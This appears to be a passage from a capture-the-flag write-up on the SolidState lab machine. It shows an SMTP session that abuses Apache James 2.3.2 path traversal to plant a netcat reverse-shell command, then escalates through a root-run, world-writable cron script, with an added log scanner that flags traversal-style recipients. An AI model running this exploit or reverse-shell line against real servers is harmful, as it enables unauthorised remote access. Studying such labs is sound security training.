After trying to escape the shell to no avail, the exploit above still lets us execute code to establish a reverse shell. This may get us out of the mindy shell and into a better one; I'm thinking a Ben Franklin kinda shell. Create a user with the following name and password on the James Remote Server
kali@kali:/opt$ telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Tue, 13 Oct 2020 07:55:43 -0400 (EDT)
ECHLO test.test
500 5.5.1 Command ECHLO unrecognized.
EHLO test.test
250-solidstate Hello test.test (10.10.14.34 [10.10.14.34])
250-PIPELINING
250 ENHANCEDSTATUSCODES
MAIL FROM: <random@random.com>
250 2.1.0 Sender <random@random.com> OK
RCPT TO: <../../../../../../../../etc/bash_completion.d@localhost>
250 2.1.5 Recipient <../../../../../../../../etc/bash_completion.d@localhost> OK
DATA
354 Ok Send data ending with <CRLF>.<CRLF>
FROM test.test
'
/bin/nc -e /bin/bash 10.10.14.34 4444
.
250 2.6.0 Message received
quit
221 2.0.0 solidstate Service closing transmission channel
Connection closed by foreign host.
That single quote above is there so that the file is interpreted properly by the back end and our reverse shell comes back.
Logging back into mindy will execute our reverse shell.
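As an added defensive check that is not part of the original writeup: a small log-scanning function that flags RCPT TO recipients whose local part looks like a filesystem path, which is exactly what the James 2.3.2 session above gets away with. The log lines are constructed samples, not output from the target.

```python
import re

# Constructed sample of RCPT TO arguments as a mail server might log them.
# The second line mirrors the traversal used in the session above.
SAMPLE_RCPT_LOG = """\
RCPT TO:<alice@localhost>
RCPT TO: <../../../../../../../../etc/bash_completion.d@localhost>
RCPT TO:<bob.smith+tag@example.org>
RCPT TO:<..\\..\\windows\\temp@localhost>
"""

# Conservative allow-list for the local part: RFC 5321 dot-atom characters,
# with no empty labels (so no leading, trailing or doubled dots).
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
LOCAL_PART_RE = re.compile(rf"^{ATEXT}(\.{ATEXT})*$")

def suspicious_local_part(address):
    """Return a reason string if the local part looks like a path, else None."""
    local, sep, _domain = address.rpartition("@")
    if not sep:
        return "no @ in address"
    # Slash is legal atext, but a local part that is really a path is the
    # whole problem here, so separators are rejected before the regex runs.
    if "/" in local or "\\" in local:
        return "path separator in local part"
    if ".." in local:
        return "parent-directory sequence in local part"
    if not LOCAL_PART_RE.match(local):
        return "local part outside RFC 5321 dot-atom characters"
    return None

def scan_rcpt_log(text):
    """Return [(address, reason)] for every RCPT TO line with a suspicious recipient."""
    hits = []
    for line in text.splitlines():
        m = re.match(r"RCPT TO:\s*<([^>]*)>", line, re.IGNORECASE)
        if not m:
            continue
        addr = m.group(1)
        reason = suspicious_local_part(addr)
        if reason:
            hits.append((addr, reason))
    return hits

if __name__ == "__main__":
    for addr, reason in scan_rcpt_log(SAMPLE_RCPT_LOG):
        print(f"ALERT {reason}: {addr}")
```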
After getting our reverse shell and running pspy32, we are able to find the following Python file.
It appears to be a cron job that executes a Python script which deletes the tmp directory. Looking further at this file and its permissions, something stood out.
This file is run and executed as root and is WRITABLE by ANY user!
Adding Python code to establish a reverse shell will give us a reverse connection as root.